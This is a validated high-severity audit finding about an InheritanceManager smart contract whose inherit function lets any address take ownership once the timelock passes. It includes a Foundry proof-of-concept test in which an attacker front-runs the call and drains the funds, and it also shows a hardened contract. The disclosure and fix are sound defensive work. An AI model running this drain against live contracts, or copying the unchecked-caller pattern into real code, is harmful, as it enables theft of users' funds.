Submission Details
Severity: high
Valid

[H-1] InheritanceManager::inherit can be front-run by anyone

Summary

The purpose of the function is to set the state variable isInherited to true. The special case is when the beneficiaries array contains a single element.

In that case the function sets the contract owner to msg.sender, which can be any address, since the function does not check that the caller is a beneficiary.

Vulnerability Details

Likelihood: High. Easily exploitable once the deadline passes, requiring only transaction ordering (common in Ethereum).

The test below creates an attacker EOA that, once the deadline has passed, front-runs the legitimate beneficiary's call to inherit, becomes the owner, removes the only beneficiary and withdraws the ERC-20 balance (the same path works for ETH).

```solidity
function test_canFrontrunInherit() public {
    address attacker = makeAddr("attacker");
    vm.warp(1);
    vm.deal(attacker, 1e18);
    // Fund the wallet so there is something to steal
    weth.mint(address(im), 100e18);

    // Owner registers a single beneficiary; this also resets the deadline
    vm.startPrank(owner);
    im.addBeneficiery(user1);
    vm.stopPrank();

    // Let the 90-day timelock elapse
    vm.warp(1 + 90 days);

    // Attacker, who is not a beneficiary, calls inherit first and becomes owner
    vm.startPrank(attacker);
    im.inherit();
    // As owner, the attacker can now remove the real beneficiary and drain funds
    im.removeBeneficiary(user1);
    im.sendERC20(address(weth), weth.balanceOf(address(im)), address(attacker));
    vm.stopPrank();

    assertEq(weth.balanceOf(address(im)), 0);
    assertEq(weth.balanceOf(address(attacker)), 100e18);
}
```

Impact

High. All funds at risk as the attacker can inherit, remove all beneficiaries and claim all funds.

Tools Used

  • Manual Review

Recommendations

Allow only registered beneficiaries to call inherit. This does not remove the risk of a malicious beneficiary, but it narrows the set of possible callers from any address to the addresses the owner chose.
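To make the recommendation concrete, the following is an added illustration and not code from the audited InheritanceManager. It is a minimal contract with the vulnerable pattern described in this finding (inheritUnchecked) next to a hardened variant (inherit) that requires the caller to be a registered beneficiary. The contract name, the 90-day TIMELOCK value, the deadline bookkeeping and the error names are assumptions chosen to mirror the finding; the real contract's storage layout and function set differ.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative contract (assumption), not the audited InheritanceManager.
contract InheritanceExample {
    uint256 public constant TIMELOCK = 90 days; // assumed timelock length

    address public owner;
    uint256 public deadline;        // timestamp of the last owner action
    bool public isInherited;
    address[] public beneficiaries;

    error NotYetInherited();
    error NotABeneficiary();

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor() {
        owner = msg.sender;
        deadline = block.timestamp;
    }

    function addBeneficiary(address b) external onlyOwner {
        beneficiaries.push(b);
        deadline = block.timestamp; // owner activity resets the clock
    }

    function getDeadline() public view returns (uint256) {
        return deadline + TIMELOCK;
    }

    function isBeneficiary(address who) public view returns (bool) {
        for (uint256 i = 0; i < beneficiaries.length; i++) {
            if (beneficiaries[i] == who) return true;
        }
        return false;
    }

    // Vulnerable pattern, as described in the finding: no caller check, so
    // with a single beneficiary any address that lands its transaction first
    // after the deadline becomes owner.
    function inheritUnchecked() external {
        if (block.timestamp < getDeadline()) revert NotYetInherited();
        if (beneficiaries.length == 1) {
            owner = msg.sender; // arbitrary caller takes ownership
        } else {
            isInherited = true;
        }
    }

    // Hardened variant: only a registered beneficiary may inherit. In the
    // single-beneficiary branch msg.sender is therefore guaranteed to be that
    // beneficiary, so a front-runner who is not on the list simply reverts.
    function inherit() external {
        if (block.timestamp < getDeadline()) revert NotYetInherited();
        if (!isBeneficiary(msg.sender)) revert NotABeneficiary();
        if (beneficiaries.length == 1) {
            owner = msg.sender; // necessarily beneficiaries[0] after the check
        } else {
            isInherited = true;
        }
    }
}
```

The only functional difference between the two functions is the isBeneficiary check; everything else, including the timelock test, is unchanged. With the check in place, the front-run in the test above would revert with NotABeneficiary before any state is modified, and a Foundry test can assert that with vm.expectRevert(InheritanceExample.NotABeneficiary.selector).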

Updates

Lead Judging Commences

0xtimefliez Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract
